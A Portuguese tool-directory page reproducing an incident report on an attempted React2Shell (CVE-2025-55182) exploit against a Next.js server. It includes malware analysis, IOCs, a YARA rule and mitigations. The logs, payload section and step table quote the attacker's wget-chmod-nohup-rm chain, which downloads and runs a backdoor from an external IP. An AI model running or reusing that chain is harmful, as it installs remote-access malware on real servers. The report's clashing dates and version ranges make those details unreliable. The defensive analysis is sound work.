Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-Attack-Analysis — Análise de ataque no mundo real do CVE-2025-55182 (React2Shell) - vulnerabilidade RCE do React Server Components | Kitploit
Ferramentas/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
Gerenciamento de Indicadores de Comprometimento (IOC)Análise de VulnerabilidadesAnálise ForenseSegurança WebAnálise de MalwareInteligência de AmeaçasAprendizado e EducaçãoResposta a Incidentes

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

Análise de ataque no mundo real do CVE-2025-55182 (React2Shell) - vulnerabilidade RCE do React Server Components

Ver Repositório
6há 9 mesesAinda não revisado
Compartilhar

Análise do Ataque CVE-2025-55182: RCE em React Server Components

Análise de ataque real em uma aplicação Next.js de produção

📋 Sumário

  • Resumo Executivo
  • Visão Geral da Vulnerabilidade
  • Linha do Tempo do Ataque
  • Análise Técnica
  • Análise do Malware
  • Indicadores de Comprometimento (IOCs)
  • Mitigação e Resposta
  • Lições Aprendidas
  • Referências

Resumo Executivo

Em 5 de dezembro de 2025, nossa aplicação Next.js de produção foi alvo de atacantes que exploraram a CVE-2025-55182 (React2Shell), uma vulnerabilidade crítica de Execução Remota de Código nos React Server Components. O ataque tentou baixar e executar um trojan backdoor Linux em nosso servidor.

AtributoValor
ID CVECVE-2025-55182
Pontuação CVSS9.8 (Crítica)
Data do Ataque5 de dezembro de 2025
Resultado do Ataque✅ Bloqueado (pós-correção)
Tipo de MalwareTrojan Backdoor Linux
Stack AfetadaNext.js + React Server Components

Visão Geral da Vulnerabilidade

O que é CVE-2025-55182?

A CVE-2025-55182, também conhecida como "React2Shell", é uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta os React Server Components (RSC) em:

  • React: versões 19.0.0 - 19.2.1
  • Next.js: versões 15.x e 16.x (antes das correções)

Causa Raiz

A vulnerabilidade existe na função renderToReadableStream() dentro do Flight Server do React. Ao processar payloads RSC especialmente criados, o servidor não consegue sanitizar adequadamente determinadas entradas, levando à execução arbitrária de código.

Vetor de Ataque

root@kitploit:~
Atacante → Payload RSC Malicioso → Flight Server → eval() → RCE

O atacante envia uma requisição POST com um payload serializado malicioso que é desserializado e executado no servidor.


Linha do Tempo do Ataque

Fase 1: Tentativas Iniciais de Exploração (Pré-correção)

Timestamp (UTC)Evento
Dec 5, 06:20Primeiro ataque detectado via Sentry
Dec 5, 06:20Payload tenta executar comandos shell
Dec 5, 06:20Ataque parcialmente bem-sucedido (pré-correção)

Log de Erro do Sentry (Pré-correção):

root@kitploit:~
Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

Fase 2: Implantação da Correção

TimestampAção
Dec 4, 14:13Atualizado para Next.js 16.0.7
Dec 4, 14:13Versão corrigida implantada (v1.0.0-beta-4)

Fase 3: Ataque Pós-correção Bloqueado

Timestamp (UTC)Evento
Dec 5, 08:48Tentativa de ataque detectada
Dec 5, 08:48Execução do payload BLOQUEADA
Dec 5, 08:48Erro: syntax error: unexpected ";"

Log de Erro do Sentry (Pós-correção):

root@kitploit:~
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

A correção impediu com sucesso a execução do comando malicioso.


Análise Técnica

Detalhes da Requisição de Ataque

AtributoValor
URL Alvohttps://[REDACTED]/

Análise do Payload

O atacante tentou executar a seguinte cadeia de comandos:

root@kitploit:~
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

Detalhamento:

Ambiente do Servidor

ComponenteVersão
Sistema OperacionalAlpine Linux 3.23.0
RuntimeNode.js v20.19.6
FrameworkNext.js 16.0.7 (corrigido)

Análise do Malware

Informações do Arquivo

Resultados do VirusTotal

Taxa de Detecção: 13/72 (18%)

Link do VirusTotal: Ver Análise

Análise do Binário

ELF Header:

root@kitploit:~
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

Capacidades Identificadas:

Strings Extraídas (Relevantes):

root@kitploit:~
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

Regras IDS Acionadas

SeveridadeRegraFonte
BAIXAET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
BAIXAET DNS Query for .cc TLDProofpoint ET Open

Classificação do Malware

Tipo: Trojan Backdoor Linux

Capacidades:

  • Acesso remoto a shell
  • Comunicação com Command & Control (C2)
  • Upload/download de arquivos
  • Comunicações criptografadas
  • Tunelamento de tráfego via SOCKS5
  • Mecanismos de persistência

Indicadores de Comprometimento (IOCs)

IOCs de Rede

IOCs de Arquivo

IOCs Comportamentais

Regra YARA

root@kitploit:~
rule CVE_2025_55182_Backdoor {
    meta:
        description = "Detects backdoor distributed via CVE-2025-55182"
        author = "Security Researcher"
        date = "2025-12-05"
        hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
    
    strings:
        $elf = { 7F 45 4C 46 }
        $go1 = "vendor/golang.org/x/crypto" ascii
        $go2 = "vendor/golang.org/x/net" ascii
        $net1 = "net/http" ascii
        $net2 = "socks5" ascii
        $crypto1 = "crypto/tls" ascii
        $crypto2 = "chacha20poly1305" ascii
    
    condition:
        $elf at 0 and
        (2 of ($go*)) and
        (1 of ($net*)) and
        (1 of ($crypto*))
}

Mitigação e Resposta

Ações Imediatas Tomadas

Relatório de Abuso

Um relatório de abuso foi enviado à Vultr (provedor de hospedagem do servidor C2) em 5 de dezembro de 2025 contendo:

  • Endereço IP e URL maliciosos
  • Hash SHA256 do malware
  • Link da análise no VirusTotal
  • Descrição do vetor de ataque (CVE-2025-55182)

Versões Corrigidas

PacoteVulneráveisCorrigidas
Next.js< 15.3.3, < 16.0.5≥ 15.3.3, ≥ 16.0.5
React19.0.0 - 19.1.0≥ 19.2.1 (junho de 2025+)

Mitigações Recomendadas

1. Atualize imediatamente:

root@kitploit:~
# Para Next.js 16.x
npm install [email protected] [email protected] [email protected]

# Para Next.js 15.x
npm install [email protected] [email protected] [email protected]

2. Bloqueie o IP malicioso:

root@kitploit:~
# iptables
sudo iptables -A INPUT -s 45.76.155.14 -j DROP
sudo iptables -A OUTPUT -d 45.76.155.14 -j DROP

# UFW
sudo ufw deny from 45.76.155.14
sudo ufw deny to 45.76.155.14

3. Monitore os IOCs:

root@kitploit:~
# Verifique arquivos suspeitos
find /tmp -type f -executable 2>/dev/null

# Verifique processos suspeitos
ps aux | grep -E "(vim|/tmp/)"

# Verifique conexões de rede
netstat -an | grep "45.76.155.14"

4. Rotacione todos os segredos:

  • Credenciais do banco de dados
  • Segredos JWT
  • Chaves de API
  • Segredos de sessão

Lições Aprendidas

O Que Funcionou Bem

  1. O monitoramento com Sentry detectou o ataque imediatamente
  2. Implantação rápida da correção em poucas horas após a divulgação do CVE
  3. A conteinerização com Docker limitou o raio de impacto
  4. A proteção pós-correção bloqueou com sucesso ataques subsequentes

O Que Poderia Ser Melhorado

  1. Correção mais rápida - Reduzir o tempo entre a divulgação do CVE e a correção
  2. Regras de WAF - Adicionar regras para detectar tentativas de exploração de RSC
  3. Filtragem de saída - Bloquear conexões de saída para IPs desconhecidos
  4. Alertas automatizados - Configurar alertas para comandos shell suspeitos

Recomendações de Segurança


Referências

Avisos Oficiais

  • Aviso de Segurança do Next.js
  • Atualizações de Segurança do React
  • Detalhes do CVE-2025-55182

Recursos de Análise

  • Análise no VirusTotal
  • MalwareBazaar

Ferramentas Utilizadas

  • Sentry - Monitoramento de erros
  • VirusTotal - Análise de malware
  • Docker - Conteinerização

Aviso Legal

Este artigo é publicado apenas para fins educacionais e defensivos. O binário do malware não está incluído neste repositório. Pesquisadores de segurança podem obter a amostra via VirusTotal usando o hash SHA256 fornecido.


Autor

Publicado: 5 de dezembro de 2025

Contato: [Suas informações de contato ou perfil do GitHub]


Licença

Esta análise é disponibilizada sob CC BY 4.0. Você é livre para compartilhar e adaptar este material com a devida atribuição.


Histórico de Alterações

DataVersãoAlterações
2025-12-051.0Publicação inicial
Baixar ferramenta
MétodoPOST
User-AgentPython Requests 2.31
OrigemScript de ataque automatizado
EtapaComandoFinalidade
1wget http://45.76.155.14/vim -O /tmp/vimBaixar malware
2chmod +x /tmp/vimTornar executável
3nohup /tmp/vim > /dev/null 2>&1 &Executar em segundo plano, persistir após logout
4rm -f /tmp/vimApagar evidências
ContainerDocker
AtributoValor
Nome do arquivovim (disfarçado de ferramenta legítima)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
Tipo de arquivoELF 64-bit LSB executable, x86-64
LinguagemGo (binário compilado)
Tamanho do arquivo~4.7 MB
FornecedorNome de Detecção
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292
CapacidadeEvidência
Cliente HTTP/HTTPSnet/http, *http.Client
Criptografia TLScrypto/tls, crypto/aes
Proxy SOCKS5socks, socks5
Resolução de DNSnet/dns/dnsmessage
Criptografia Fortechacha20poly1305, Ed25519
TipoValorDescrição
Endereço IP45.76.155.14Servidor de distribuição do malware
URLhttp://45.76.155.14/vimURL de download do malware
HospedagemVultr VPSProvedor de nuvem
TLD.ccDomínio do C2 usa TLD .cc
TipoValor
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[Calcular se necessário]
MD5[Calcular se necessário]
Nome do arquivovim (disfarçado)
Tipo de arquivoELF 64-bit x86-64
Tamanho do arquivo~4.7 MB
IndicadorDescrição
wget para IP externoDownloads de URLs não padronizadas
Arquivos em /tmp/Executável suspeito no diretório temporário
nohup + execução em segundo planoTentativa de persistência
Exclusão imediata de arquivoLimpeza de evidências
User-Agent Python RequestsFerramenta de ataque automatizada
AçãoStatusDetalhes
✅ Atualizar Next.jsConcluído16.0.4 → 16.0.7
✅ Atualizar ReactConcluído19.1.0 → 19.2.1 (corrigido)
✅ Reimplantar aplicaçãoConcluídoRebuild do Docker
✅ Analisar malwareConcluídoEnvio ao VirusTotal
✅ Reportar à hospedagemConcluídoRelatório de abuso enviado ao Vultr
⏳ Rotacionar credenciaisPendenteBanco de dados, JWT, chaves de API
CategoriaRecomendação
MonitoramentoImplemente monitoramento de erros em tempo real (Sentry, etc.)
AtualizaçõesAssine os avisos de segurança de todas as dependências
RedeImplemente filtragem de saída, bloqueie tráfego de saída desnecessário
ContêineresExecute como não-root, use sistemas de arquivos somente leitura
SegredosRotacione credenciais regularmente, use um gerenciador de segredos